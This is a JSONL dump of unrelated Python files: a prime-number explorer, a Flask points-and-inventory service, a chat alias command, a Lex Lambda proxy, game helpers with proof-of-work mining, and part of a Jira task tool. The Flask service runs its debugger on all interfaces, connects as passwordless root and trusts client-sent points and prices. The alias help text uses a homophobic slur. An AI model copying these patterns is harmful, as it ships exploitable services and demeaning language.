+ \" \" + str(end1to1/len(primes)))\r\n print(\"end1to3\" + \" \" +str(end1to3/len(primes)))\r\n print(\"end1to5\" + \" \" + str(end1to5/len(primes)))\r\n print(\"end1to7\" + \" \" + str(end1to7/len(primes)))\r\n print(\"end1to9\" + \" \" + str(end1to9/len(primes)))\r\n \r\n print(\"end3\" + \" \" + str(end3/len(primes)))\r\n print(\"end3to1\" + \" \" + str(end3to1/len(primes)))\r\n print(\"end3to3\" + \" \" +str(end3to3/len(primes)))\r\n print(\"end3to5\" + \" \" + str(end3to5/len(primes)))\r\n print(\"end3to7\" + \" \" + str(end3to7/len(primes)))\r\n print(\"end3to9\" + \" \" + str(end3to9/len(primes)))\r\n \r\n print(\"end5\" + \" \" + str(end5/len(primes)))\r\n print(\"end5to1\" + \" \" + str(end5to1/len(primes)))\r\n print(\"end5to3\" + \" \" +str(end5to3/len(primes)))\r\n print(\"end5to5\" + \" \" + str(end5to5/len(primes)))\r\n print(\"end5to7\" + \" \" + str(end5to7/len(primes)))\r\n print(\"end5to9\" + \" \" + str(end5to9/len(primes)))\r\n \r\n print(\"end7\" + \" \" + str(end7/len(primes)))\r\n print(\"end7to1\" + \" \" + str(end7to1/len(primes)))\r\n print(\"end7to3\" + \" \" +str(end7to3/len(primes)))\r\n print(\"end7to5\" + \" \" + str(end7to5/len(primes)))\r\n print(\"end7to7\" + \" \" + str(end7to7/len(primes)))\r\n print(\"end7to9\" + \" \" + str(end7to9/len(primes)))\r\n \r\n 
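# Aside: the pairwise last-digit ratios printed in this block could also be\r\n    # gathered with collections.Counter; an equivalent sketch, kept as a comment\r\n    # so the explicit counters above stay the single source of truth:\r\n    #   from collections import Counter\r\n    #   trans = Counter((str(p)[-1], str(q)[-1]) for p, q in zip(primes, primes[1:]))\r\n    #   trans[('9', '1')] / len(primes)  # same ratio as the end9to1 line below\r\n    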
print(\"end9\" + \" \" + str(end9/len(primes)))\r\n print(\"end9to1\" + \" \" + str(end9to1/len(primes)))\r\n print(\"end9to3\" + \" \" + str(end9to3/len(primes)))\r\n print(\"end9to5\" + \" \" + str(end9to5/len(primes)))\r\n print(\"end9to7\" + \" \" + str(end9to7/len(primes)))\r\n print(\"end9to9\" + \" \" + str(end9to9/len(primes)))\r\n \r\n # This method is used to draw the squares for the visualization \r\ndef draw_square(n):\r\n t.left(n % 360)\r\n \r\n t.forward(n)\r\n t.left(90)\r\n t.forward(n)\r\n t.left(90)\r\n t.forward(n)\r\n t.left(90)\r\n t.forward(n)\r\n t.left(90)\r\n \r\n primename = str(n)\r\n t.colormode(255)\r\n t.bgcolor(0,0,0)\r\n if primename[-1] == '1':\r\n t.pencolor(233,150,122)\r\n if primename[-1] == '2':\r\n t.pencolor(240,255,255)\r\n if primename[-1] == '3':\r\n t.pencolor(139,0 ,139)\r\n if primename[-1] == '5':\r\n t.pencolor(0,255,255)\r\n if primename[-1] == '7':\r\n t.pencolor(220,20,60)\r\n if primename[-1] == '9':\r\n t.pencolor(145,44,238)\r\n\r\n\r\ndef visualizer(n):\r\n t.clear()\r\n t.reset()\r\n primes = prime(n)\r\n for i in range(n):\r\n draw_square(primes[i])\r\n\r\n\r\ndef menu():\r\n print(\"The Prime Project: \")\r\n print(\"1.Find the Greatest Common Denominator\")\r\n print(\"2. Generate Prime Numbers\")\r\n print(\"3. Primality Test Using Trial Division\") \r\n print(\"4. Primality Test Using Sieve of Eratosthenes.\")\r\n print(\"5. Prime Factorization\")\r\n print(\"6. Prime Distribution and Twin Primes\")\r\n print(\"7. Prime Visualization\")\r\n \r\n \r\n choice = input(\"What would you like to do?\")\r\n if choice == '1':\r\n integer1 = int(input(\"Enter the an integer: \"))\r\n integer2 = int(input(\"Enter another integer: \"))\r\n print(GCD(integer1, integer2))\r\n menu()\r\n if choice == '2':\r\n integer1 = int(input(\"Enter the range you want: \"))\r\n print(prime(integer1))\r\n print(\"There are \" + str(len(prime(integer1))) + \" prime numbers in this range.\")\r\n menu()\r\n if choice == '3':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n trialdivision(integer1)\r\n menu()\r\n if choice == '4':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n primalitysieve(integer1)\r\n menu()\r\n if choice == '5':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n factorization(integer1)\r\n menu()\r\n if choice == '6':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n distribution(integer1)\r\n menu()\r\n \r\n if choice == '7':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n visualizer(integer1)\r\n menu()\r\n\r\nprint(\"Welcome to the Prime Project.\")\r\nprint(\"This program allows us to explore the beauty of prime numbers.\")\r\nprint(\"Just enter the number associated with a choice on the number so use the program.\")\r\nprint(\"And keep in mind that the visualization opens up a new window\")\r\nprint(\"Thanks for using my program!\")\r\nmenu()\r\n\r\n","sub_path":"Prime_Project.py","file_name":"Prime_Project.py","file_ext":"py","file_size_in_byte":11186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"614483895","text":"from flask import Flask, request, jsonify, render_template, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom os import environ\r\nimport requests\r\nfrom datetime import datetime\r\nfrom flask_cors import CORS\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n# SQL settings\r\napp.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL') or 
'mysql+mysqlconnector://root@localhost:3306/user'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\napp.config['SQLALCHEMY_ENGINE_OPTIONS'] = {'pool_recycle': 299}\r\n\r\ndb = SQLAlchemy(app)\r\nCORS(app)\r\n\r\nclass users(db.Model):\r\n    __tablename__ = 'users'\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    username = db.Column(db.String(300), unique=True)\r\n    is_member = db.Column(db.String(1), nullable=False)\r\n    membership_date = db.Column(db.Date)\r\n    current_points = db.Column(db.Integer)\r\n    total_points = db.Column(db.Integer)\r\n    boxes_open = db.Column(db.Integer)\r\n    last_login = db.Column(db.Date)\r\n    daily_boxes = db.Column(db.Integer)\r\n\r\n    def json(self):\r\n        return {\r\n            \"username\":self.username,\r\n            \"is_member\":self.is_member,\r\n            \"membership_date\":self.membership_date,\r\n            \"current_points\":self.current_points,\r\n            \"total_points\":self.total_points,\r\n            \"boxes_open\":self.boxes_open,\r\n            \"last_login\":self.last_login,\r\n            \"daily_boxes\":self.daily_boxes\r\n        }\r\n    \r\n    def lbpjson(self):\r\n        return {\r\n            \"username\":self.username,\r\n            \"total_points\":self.total_points\r\n        }\r\n    \r\n    def lbbjson(self):\r\n        return {\r\n            \"username\":self.username,\r\n            \"boxes_open\":self.boxes_open\r\n        }\r\n\r\n    def cbjson(self):\r\n        return{\r\n            \"username\":self.username,\r\n            \"current_points\":self.current_points\r\n        }\r\n    \r\n    def memjson(self):\r\n        return {\r\n            \"username\": self.username,\r\n            \"is_member\": self.is_member\r\n        }\r\n\r\n    def boxjson(self):\r\n        return {\r\n            \"username\": self.username,\r\n            \"daily_boxes\": self.daily_boxes\r\n        }\r\n\r\n\r\nclass user_inventory(db.Model):\r\n    __tablename__ = 'user_inventory'\r\n    username = db.Column(db.String(300), primary_key=True)\r\n    itemname = db.Column(db.String(100), primary_key=True)\r\n    quantity = db.Column(db.Integer,nullable=False)\r\n\r\n    def __init__(self,username,itemname,quantity):\r\n        self.username=username\r\n        self.itemname=itemname\r\n        self.quantity=quantity\r\n\r\n    def json(self):\r\n        return{\r\n            \"itemname\":self.itemname,\r\n            \"quantity\":self.quantity\r\n        }\r\n\r\n@app.route('/user/boxcount/<username>')\r\ndef boxCount(username):\r\n    user = users.query.filter_by(username=username).first()\r\n    if user:\r\n        return jsonify({\r\n            \"code\":200,\r\n            \"data\": user.boxjson()\r\n        }),200\r\n    else:\r\n        return jsonify({\r\n            \"code\": 404,\r\n            \"message\": \"User not found.\"\r\n        }),404\r\n\r\n\r\n@app.route('/user/useBox',methods=['PUT'])\r\ndef useBox():\r\n    # JSON PASSED - {username}\r\n    data = request.get_json()\r\n    username = data['username']\r\n\r\n    user = users.query.filter_by(username=username).first()\r\n\r\n    if user:\r\n        if user.daily_boxes == 0:\r\n            return jsonify({\r\n                \"code\":500,\r\n                \"message\": \"You have zero boxes.\"\r\n            })\r\n        else:\r\n            user.daily_boxes -= 1\r\n            db.session.commit()\r\n            return jsonify({\r\n                \"code\":200,\r\n                \"message\": \"Box deducted successfully.\"\r\n            })\r\n    else:\r\n        return jsonify({\r\n            \"code\": 404,\r\n            \"message\": 'User not found.'\r\n        })\r\n\r\n\r\n@app.route('/user/lastlogin',methods=['PUT'])\r\ndef updateLastLogin():\r\n    # JSON PASSED - {username}\r\n    data = request.get_json()\r\n    username = data['username']\r\n    \r\n    user = users.query.filter_by(username=username).first()\r\n    if user:\r\n        login_date = datetime.today().strftime('%Y-%m-%d')\r\n        is_member = False\r\n        if user.is_member == \"Y\":\r\n            is_member = True\r\n        user_last_login = user.last_login\r\n        if str(user_last_login) == str(login_date):\r\n            return jsonify({\r\n                \"code\": 200,\r\n                \"message\": \"User 
logged in today already.\"\r\n })\r\n else:\r\n user.last_login = login_date\r\n if is_member:\r\n user.daily_boxes = 5\r\n else:\r\n user.daily_boxes = 3\r\n db.session.commit()\r\n\r\n return jsonify({\r\n \"code\": 200,\r\n \"message\": \"Welcome back, you have received \" + str(user.daily_boxes) +\" boxes. Happy planting!\",\r\n })\r\n\r\n\r\n\r\n else:\r\n return jsonify({\r\n \"code\": 404,\r\n \"message\": 'User not found.'\r\n })\r\n\r\n\r\n\r\n\r\n@app.route('/user/checkmember/')\r\ndef check_member(username):\r\n user = users.query.filter_by(username=username).first()\r\n if user:\r\n return jsonify({\r\n \"code\": 200,\r\n \"user\": user.memjson()\r\n }),200\r\n else:\r\n return jsonify({\r\n \"code\": 404,\r\n \"message\": 'User not found.'\r\n })\r\n\r\n\r\n@app.route(\"/user/\")\r\ndef get_user(username):\r\n user = users.query.filter_by(username=username).first()\r\n if user:\r\n return jsonify({\r\n \"code\": 200,\r\n \"user\": user.json()\r\n }),200\r\n else:\r\n return jsonify({\r\n \"code\":404,\r\n \"user\": \"Not found.\"\r\n }),404\r\n\r\n@app.route(\"/user/getInventory/\")\r\ndef get_inventory(username):\r\n inventory_list = []\r\n inventory_list = user_inventory.query.filter_by(username=username)\r\n if inventory_list == [] or inventory_list == None:\r\n return jsonify({\r\n \"code\":200,\r\n \"inventory\": \"You have no items in your inventory.\"\r\n }), 200\r\n else:\r\n item_list = []\r\n for inventory in inventory_list:\r\n item_list.append(inventory.json())\r\n \r\n return jsonify({\r\n \"code\": 200,\r\n \"inventory\": item_list\r\n }), 200\r\n\r\n\r\n\r\n\r\n@app.route(\"/user/leaderboardRank\")\r\ndef leaderboard():\r\n # get top 10 for both point and box open\r\n lbpoint = users.query.order_by(users.total_points.desc()).limit(10).all()\r\n lbbox = users.query.order_by(users.boxes_open.desc()).limit(10).all()\r\n\r\n # check in there is record in both of the lb\r\n if lbbox and lbpoint:\r\n # print(lbbox)\r\n # print(lbpoint)\r\n #return result\r\n lbpoint_array = []\r\n lbbox_array = []\r\n for user in lbpoint:\r\n lbpoint_array.append(user.lbpjson())\r\n for user2 in lbbox:\r\n lbbox_array.append(user2.lbbjson())\r\n\r\n return jsonify(\r\n {\r\n \"code\": 200,\r\n \"top10_points\": lbpoint_array,\r\n \"top10_boxes\": lbbox_array\r\n }\r\n )\r\n #return error for no record found\r\n return jsonify(\r\n {\r\n \"code\": 404,\r\n \"message\": \"there are no records found\"\r\n }\r\n ), 404\r\n\r\n@app.route(\"/user/balance/\")\r\ndef checkbalance(username):\r\n #get the user record\r\n checkb = users.query.filter_by(username=username).first()\r\n #check if user record is found\r\n if checkb:\r\n # if record found return the balance\r\n return jsonify(\r\n {\r\n \"code\": 200,\r\n \"data\": checkb.cbjson()\r\n }\r\n )\r\n #return error for no such user\r\n return jsonify(\r\n {\r\n \"code\": 404,\r\n \"message\": \"There is no such user existing\"\r\n }\r\n ), 404\r\n\r\n@app.route(\"/user/membership/\", methods=['PUT'])\r\ndef updatemembership(username):\r\n # Data to be passed through should be {username, membership-date}\r\n #get the user record\r\n usermembership = users.query.filter_by(username=username).first()\r\n # check if the user is in our record\r\n if usermembership:\r\n data = {\r\n \"username\": request.json.get('username'),\r\n \"membership-date\": request.json.get('membership-date')\r\n }\r\n #double check if the requested username sync with our database username again\r\n if data['username'] == usermembership.username:\r\n #check if user is 
existing member or not\r\n            if usermembership.is_member != \"Y\":\r\n                #update the membership record\r\n                usermembership.is_member = \"Y\"\r\n                usermembership.membership_date = data['membership-date']\r\n                db.session.commit()\r\n                return jsonify(\r\n                    {\r\n                        \"code\": 200,\r\n                        \"data\": usermembership.json(),\r\n                        \"message\": \"Membership has been successfully applied\"\r\n                    }\r\n                ),200\r\n            #return error for existing membership\r\n            return jsonify(\r\n                {\r\n                    \"code\": 500,\r\n                    \"data\": usermembership.json(),\r\n                    \"message\": \"user is an existing subscribed member\"\r\n                }\r\n            ),500\r\n        \r\n        return jsonify(\r\n            {\r\n                \"code\": 403,\r\n                \"message\": \"Usernames do NOT match!\"\r\n            }\r\n        ),403\r\n\r\n    #return error for user not found\r\n    return jsonify(\r\n        {\r\n            \"code\": 404,\r\n            \"data\": {\r\n                \"username\": username\r\n            },\r\n            \"message\": \"username not found\"\r\n        }\r\n    ), 404\r\n\r\n@app.route(\"/user/openbox/<username>\", methods=['PUT'])\r\ndef openbox(username):\r\n    # JSON PASSED THROUGH { box_contents, box_latitude, box_longitude, boxid, is_opened, no_of_points, planted_by_username }\r\n    #get record for user\r\n    points = users.query.filter_by(username=username).first()\r\n\r\n    #check if such a user is in our user database\r\n    if points:\r\n        #check if user is a member\r\n        is_member = False\r\n        if points.is_member == \"Y\":\r\n            is_member = True\r\n\r\n        #get box stuff from content \r\n        data = request.get_json()\r\n        itemname = data['box_contents']\r\n        #get record of the user inventory\r\n        content = \"\"\r\n        if itemname != None:\r\n            content = user_inventory.query.filter_by(username=username, itemname=itemname).first()\r\n        #check if an existing record matches both primary keys (username and itemname)\r\n        if content:\r\n            #double-check it matches the db record\r\n            if itemname == content.itemname:\r\n                #update quantity\r\n                content.quantity += 1\r\n        elif content != \"\" and itemname != None:\r\n            #print(\"hello\")\r\n            #if no record found need to create one\r\n            createcontent = user_inventory(username, itemname, 1)\r\n            print(createcontent)\r\n            try:\r\n                db.session.add(createcontent)\r\n                db.session.commit()\r\n            except Exception as e:\r\n                # return error when fail to insert\r\n                return jsonify(\r\n                    {\r\n                        \"code\":500,\r\n                        \"message\": \"an error occurred updating user inventory: \" + str(e)\r\n                    }\r\n                ), 500\r\n        #update user points in user db\r\n        #update points of the user (members earn double)\r\n        if is_member:\r\n            data['no_of_points'] *= 2\r\n        points.total_points += data['no_of_points']\r\n        points.current_points += data['no_of_points']\r\n        #update user number of boxes open\r\n        points.boxes_open += 1\r\n        db.session.commit()\r\n\r\n        #return success for both content and points updated\r\n        return jsonify(\r\n            {\r\n                \"code\":200,\r\n                \"data\":{\r\n                    \"item_won\": itemname,\r\n                    \"points_earned\": data['no_of_points']\r\n                }\r\n            }\r\n        ),200\r\n    #return error when username not found\r\n    return jsonify(\r\n        {\r\n            \"code\": 404,\r\n            \"data\": {\r\n                \"username\": username\r\n            },\r\n            \"message\": \"user not found\"\r\n        }\r\n    ),404\r\n\r\n\r\n@app.route(\"/user/purchase/<username>\", methods=['PUT'])\r\ndef purchase(username):\r\n    # DATA PASSED THROUGH { data: [ {itemname,price,quantity}, {itemname,price,quantity}, ...] 
}\r\n    data = request.get_json()\r\n    #get record for user\r\n    user = users.query.filter_by(username=username).first()\r\n\r\n    #check if such a user is in our user database\r\n    if user:\r\n        # Check if user is a member\r\n        is_member = False\r\n        if user.is_member == \"Y\":\r\n            is_member = True\r\n\r\n        user_balance = user.current_points\r\n        cart = data['data']\r\n        if cart != []:\r\n            subtotal = 0\r\n            for item_dict in cart:\r\n                if is_member:\r\n                    item_dict['price'] *= 0.80\r\n                subtotal += item_dict['price'] * int(item_dict['quantity'])\r\n            #print(subtotal)\r\n            #print(user_balance)\r\n            # If user has enough points\r\n            if user_balance >= subtotal:\r\n                # Updating user's balance\r\n                try:\r\n                    user.current_points -= subtotal\r\n                    db.session.commit()\r\n                except Exception as e:\r\n                    return jsonify({\r\n                        \"code\": 500,\r\n                        \"message\": \"An error occurred when trying to update user balance: \" + str(e)\r\n                    }),500\r\n\r\n                # Update user's inventory\r\n                item_list = []\r\n                for item_dict in cart:\r\n                    item_list.append(item_dict['itemname'] + \"(\" + str(item_dict['quantity']) + \")\")\r\n                    content = user_inventory.query.filter_by(username=username,itemname=item_dict['itemname']).first()\r\n                    if content == None:\r\n                        createcontent = user_inventory(username, item_dict['itemname'], int(item_dict['quantity']))\r\n                        try:\r\n                            db.session.add(createcontent)\r\n                            db.session.commit()\r\n                            del createcontent\r\n                        except Exception as e:\r\n                            # return error when fail to insert\r\n                            return jsonify(\r\n                                {\r\n                                    \"code\":500,\r\n                                    \"message\": \"an error occurred updating user inventory: \" + str(e)\r\n                                }\r\n                            ), 500\r\n                    else:\r\n                        content.quantity += int(item_dict['quantity'])\r\n                        try:\r\n                            db.session.commit()\r\n                        except Exception as e:\r\n                            # return error when fail to insert\r\n                            return jsonify(\r\n                                {\r\n                                    \"code\":500,\r\n                                    \"message\": \"an error occurred updating user inventory: \" + str(e)\r\n                                }\r\n                            ), 500\r\n                item_string = \",\".join(item_list)\r\n                return jsonify({\r\n                    \"code\":200,\r\n                    \"message\": \"Purchase is successful. Your items have been added to your inventory.\",\r\n                    \"currencyUsed\": subtotal,\r\n                    \"items_received\": item_string\r\n                }),200\r\n\r\n\r\n            return jsonify({\r\n                \"code\": 500,\r\n                \"message\": \"You do not have enough points to purchase everything in your cart!\"\r\n            })\r\n        \r\n        return jsonify({\r\n            \"code\": 404,\r\n            \"message\": \"Your cart is empty. Please select at least 1 item before you checkout.\"\r\n        }),404\r\n    #return error when username not found\r\n    return jsonify(\r\n        {\r\n            \"code\": 404,\r\n            \"data\": {\r\n                \"username\": username\r\n            },\r\n            \"message\": \"user not found\"\r\n        }\r\n    ),404\r\n\r\n\r\nif __name__ == '__main__':\r\n    app.run(host=\"0.0.0.0\",port=5004, debug=True)\r\n","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":16481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"554865320","text":"# -*- coding: utf-8 -*-\n# from twisted.words.xish import domish\n\nfrom base import *\nimport random\n\nimport bnw.core.bnw_objects as objs\n\nALIAS_RE = '[a-zA-Z0-9_-]+'\n\n\n@require_auth\n@check_arg(set=ALIAS_RE, delete=ALIAS_RE)\n@defer.inlineCallbacks\ndef cmd_alias(request, set=\"\", delete=\"\", value=\"\"):\n    \"\"\" Alias list \"\"\"\n    if not (delete or (set and value)):\n        defer.returnValue(\n            dict(\n                ok=False, desc='Usage: alias -s <name> <command>\n\t\tor alias -d <name>\nFor example, \"alias -s fag pm -u %1 YOU ARE A FAG!\" will make it easy to tell someone that he is a fag. 
Just \"fag \"!')\n )\n\n if set:\n assert len(set) <= 32 and len(value) <= 1024\n _ = yield objs.User.mupdate({'name': request.user['name']}, {'$set': {'aliases.%s' % (set,): value}})\n defer.returnValue(\n dict(ok=True,\n desc='Alias %s updated.' % (set,)\n )\n )\n elif delete:\n assert len(delete) <= 32\n _ = yield objs.User.mupdate({'name': request.user['name']}, {'$unset': {'aliases.%s' % (delete,): 1}})\n defer.returnValue(\n dict(ok=True,\n desc='Alias %s deleted.' % (delete,)\n )\n )\n","sub_path":"bnw/handlers/command_alias.py","file_name":"command_alias.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"99904654","text":"import json\nimport boto3\n\ndef lambda_handler(event, context):\n \n client = boto3.client('lex-runtime')\n\n response = client.post_text(\n botName=\"DiningConcierge\",\n botAlias=\"$LATEST\",\n userId=\"frontend\",\n inputText= event[\"userQuery\"]\n )\n \n return {\n 'statusCode': 200,\n 'body': response[\"message\"]\n }\n","sub_path":"LF0.py","file_name":"LF0.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"228677674","text":"#Functions to help playing the game.\nimport hashlib\nimport requests\nimport json\nimport time\nfrom datetime import datetime\nimport random\nfrom util import Stack,Queue\n\ndef path_to_current_room(oldroom,newroom,room_dict):\n paths = []\n visited = set()\n bft_queue = Queue()\n direction_queue = Queue()\n direction_queue.enqueue([None])\n bft_queue.enqueue([oldroom])\n while bft_queue.size() > 0:\n vertex_path = bft_queue.dequeue()\n direction_path = direction_queue.dequeue()\n vertex = vertex_path[-1]\n if vertex not in visited:\n visited.add(vertex)\n if vertex == newroom:\n return vertex_path,direction_path\n if vertex in room_dict.keys():\n for direction in room_dict[vertex]['exits']:\n path_copy = vertex_path.copy()\n direction_copy = direction_path.copy()\n room_no = room_dict[vertex][direction]\n path_copy.append(room_no)\n direction_copy.append(direction)\n direction_queue.enqueue(direction_copy)\n bft_queue.enqueue(path_copy)\n\ndef move_known_room(direction,room_no,cooldown,headers,visit_url):\n time.sleep(cooldown+0.1)\n data_direction = {}\n data_direction['direction'] = direction\n data_direction['next_room_id'] = str(room_no)\n data = json.dumps(data_direction)\n r = requests.post(visit_url,data=data, headers=headers)\n room_details = json.loads(r.text)\n print(f'moved {direction} to room {room_details[\"room_id\"]}')\n \n return room_details,room_details['cooldown']\n\ndef get_dash_results(moving_list):\n result_list = []\n current = moving_list[0]\n count = 0\n for value in moving_list:\n if value == current:\n count += 1\n else:\n result_list.append((current, count))\n current = value\n count = 1\n result_list.append((current, count))\n return result_list\n\ndef move_dash_rooms(direction,no_rooms,rooms_list,cooldown,headers,visit_url):\n time.sleep(cooldown+0.1)\n rs = str(rooms_list).replace('[','').replace(']','').replace(' ','')\n data_direction = {\"direction\":direction, \"num_rooms\":str(no_rooms), \"next_room_ids\":rs}\n data = json.dumps(data_direction)\n #print(f'dash data:{data}')\n r = requests.post(visit_url,data=data, headers=headers)\n room_details = json.loads(r.text)\n print(f'dash moved {direction} to room {room_details[\"room_id\"]}')\n \n \n return room_details,room_details['cooldown'] \n \n\n\ndef 
dash_current_room(rooms,directions,cooldown,headers,list_urls,room_dict):\n dash_results = get_dash_results(directions)\n print(f'dash_results:{dash_results}')\n i=0\n for result in dash_results:\n direction, number = result\n if number == 1:\n room_no,cooldown = move_known_room(direction,rooms[i],cooldown,headers,list_urls[0])\n room_dict[room_no['room_id']].update(room_no)\n #print('normal move',room_dict[room_no['room_id']])\n i += 1\n else:\n room_no,cooldown = move_dash_rooms(direction,number,rooms[i:i+number],cooldown,headers,list_urls[1])\n room_dict[room_no['room_id']].update(room_no)\n #print('dash move',room_dict[room_no['room_id']])\n i += number\n return room_no, cooldown,room_dict\n\ndef visit_current_room(rooms,directions,cooldown,headers,visit_url,room_dict):\n for i in range(len(directions)):\n room_no, cooldown= move_known_room(directions[i],rooms[i],cooldown,headers,visit_url)\n room_dict[room_no['room_id']].update(room_no)\n print(f'In room:{room_no}')\n return room_no, cooldown,room_dict\n\n\ndef visit_using_dash(oldroom,newroom,room_dict,cooldown,headers,list_urls):\n room_path,direction_path = path_to_current_room(oldroom,newroom,room_dict)\n room_path.pop(0)\n direction_path.pop(0)\n # print(len(direction_path))\n # print(room_path)\n # print(direction_path)\n response,cooldown,room_dict = dash_current_room(room_path,direction_path,cooldown,headers,list_urls,room_dict)\n return response,cooldown,room_dict\n\n\ndef visit_using_normal(oldroom,newroom,room_dict,cooldown,headers,visit_url):\n room_path,direction_path = path_to_current_room(oldroom,newroom,room_dict)\n room_path.pop(0)\n direction_path.pop(0)\n response,cooldown,room_dict = visit_current_room(room_path,direction_path,cooldown,headers,visit_url,room_dict)\n return response,cooldown,room_dict\n\n\n\ndef get_new_proof(block,difficulty):\n \"\"\"\n Simple Proof of Work Algorithm\n Stringify the block and look for a proof.\n Loop through possibilities, checking each one against `valid_proof`\n in an effort to find a number that is a valid proof\n :return: A valid proof for the provided block\n \"\"\"\n proof = random.randint(1,100)\n json_block = json.dumps(block,sort_keys=True)\n pattern = None\n for i in range(difficulty):\n if i == 0:\n pattern = '0'\n else:\n pattern += '0'\n print(pattern)\n while valid_proof(json_block,proof,difficulty,pattern) is False:\n proof +=1\n return proof\n\n\ndef valid_proof(block_string, proof,difficulty,pattern):\n \"\"\"\n Validates the Proof: Does hash(block_string, proof) contain 6\n leading zeroes? 
Return true if the proof is valid\n :param block_string: The stringified block to use to\n check in combination with `proof`\n :param proof: The value that when combined with the\n stringified previous block results in a hash that has the\n correct number of leading zeroes.\n :return: True if the resulting hash is a valid proof, False otherwise\n \"\"\"\n block_string_proof = f'{block_string}{proof}'.encode()\n hash_block = hashlib.sha256(block_string_proof).hexdigest()\n #print(\"hasbloc\",hash_block)\n\n\n if hash_block[:difficulty]==pattern:\n print(\"hasbloc\",hash_block)\n return True\n else:\n return False\n\n","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"61343350","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import print_function\nfrom .loader import load\nimport re\nfrom .task_extractor_exceptions import TaskExtractorTemplateErrorProject, TaskExtractorJiraValidationError\nfrom jira import JIRAError\n\n\nclass TaskExtractor:\n\n def __init__(self,\n jira,\n options={},\n dry_run=False):\n self.rt_vars = {} # run-time variables (issueIDs)\n self.links = [] # to keep link info\n\n self.default_params = options\n self.dry_run = dry_run\n\n self.jira = jira\n\n# ###################################################################################\n# helpers for validate_load()\n\n def _validate_url_and_type(self, url):\n match = re.search(\"^https?://\", url)\n return url if match else \"http://\" + url\n\n# end of load() helpers\n# ###################################################################################\n\n def validate_load(self, task_list):\n \"\"\"\n Take the task_list prepared by load() and validate assignees and projects\n \"\"\"\n assignees = []\n\n for line in task_list:\n if 'assignee' in line:\n if line['assignee'] not in assignees:\n assignees.append(line['assignee'])\n self._validate_user(\n line['assignee'],\n self._get_project_or_raise_exception(line))\n\n\n# ###################################################################################\n# helpers for validate_load()\n\n def _get_project_or_raise_exception(self, input_line):\n try:\n return input_line['tmpl_ext']['project']['key']\n except KeyError:\n if 'project' in self.default_params:\n return self.default_params['project']['key']\n else:\n raise TaskExtractorTemplateErrorProject('Missing project key in line: ' + input_line['summary'] \\\n + '.\\nYou should add \\'{\"project\": {\"key\": \"JIRA\"}}\\' to the template, where \"JIRA\" must be replaced by your real project key.')\n\n def _validate_user(self, user, project):\n \"\"\"\n Checks if a new issue of the project can be assigned to the user.\n http://docs.atlassian.com/jira/REST/latest/#id120417\n \"\"\"\n\n# print self.jira.search_assignable_users_for_issues('admi', project=project)\n\n# full_url = \"user/assignable/search?username={0}&project={1}\".format(user, project)\n# try:\n# self.jira.get('user/assignable/search', username=user, project=project)\n# except JiraConnectActionError, e:\n# if e.code == 403 or e.code == 401:\n# error_message = \"Your username and password are not accepted by Jira.\"\n# raise TaskExtractorJiraValidationError(error_message)\n# else:\n# raise TaskExtractorJiraValidationError(e.message)\n# try:\n# res = self._jira_request(full_url, None, 'GET')\n# print res\n# result = json.loads(res)\n# except URLError, e:\n# if hasattr(e, 'code'):\n# if e.code == 403 or 
e.code == 401:\n# error_message = \"Your username and password are not accepted by Jira.\"\n# raise TaskExtractorJiraValidationError(error_message)\n# else:\n# error_message = \"The username '%s' and the project '%s' can not be validated.\\nJira response: Error %s, %s\" % (user, project, e.code, full_url) #e.read())\n# raise TaskExtractorJiraValidationError(error_message)\n# elif hasattr(e, 'reason'):\n## error_message = \"%s: %s\" % (e.reason, self.jira_url)\n# raise TaskExtractorJiraHostProblem(error_message)\n# if len(result) == 0: # the project is okay but username is missing n Jira\n# error_message = \"ERROR: the username '%s' specified in template can not be validated.\" % user\n# raise TaskExtractorJiraValidationError(error_message)\n\n\n# end of load() helpers\n###############################################################################\n\n def load(self, fd):\n \"\"\"Load templates from files.\n\n Args:\n fd (): template file.\n\n Returns:\n list: TODO: describe format.\n \"\"\"\n return load(fd)\n\n def jira_format(self, task):\n fields = {}\n\n fields.update(self.default_params)\n if 'tmpl_ext' in task:\n fields.update(task['tmpl_ext'])\n if 'duedate' in task:\n fields['duedate'] = task['duedate']\n fields['summary'] = task['summary']\n if 'description' in task:\n fields['description'] = task['description']\n fields['issuetype'] = {'name': task['issuetype']}\n fields['assignee'] = {'name': task['assignee']}\n if 'parent' in task:\n fields['parent'] = {'key': task['parent']}\n\n return fields\n\n def create_tasks(self, task_list):\n \"\"\"\n It takes the task_list prepared by load(), creates all tasks\n and compose created tasks summary.\n \"\"\"\n\n summary = []\n args = {}\n actions = {\n 'h4.': self._create_h4_task,\n '..': self._attach_h4_task,\n 'h5.': self._create_h5_task,\n '...': self._attach_existing_h5_task,\n '(-)': self._create_sub_task,\n '#': self._create_sub_task,\n '#*': self._create_sub_task\n }\n\n for line in task_list:\n if 'markup' in line:\n if 'description' in line:\n line['description'] = \\\n self._replace_realtime_vars(line['description'])\n summary.extend(actions[line['markup']](line, args))\n elif 'text' in line:\n summary.append(line['text'])\n if 'h5_task_desc' in args:\n args['h5_task_desc'].append(line['text'])\n\n if 'h5_task_key' in args:\n self._h5_task_completion(args)\n\n for link in self.links:\n self.create_link(self._replace_realtime_vars(link['inward']),\n self._replace_realtime_vars(link['outward']),\n link['type'])\n\n return '\\n'.join(summary)\n\n# ###################################################################################\n# several helpers for create_tasks()\n\n def 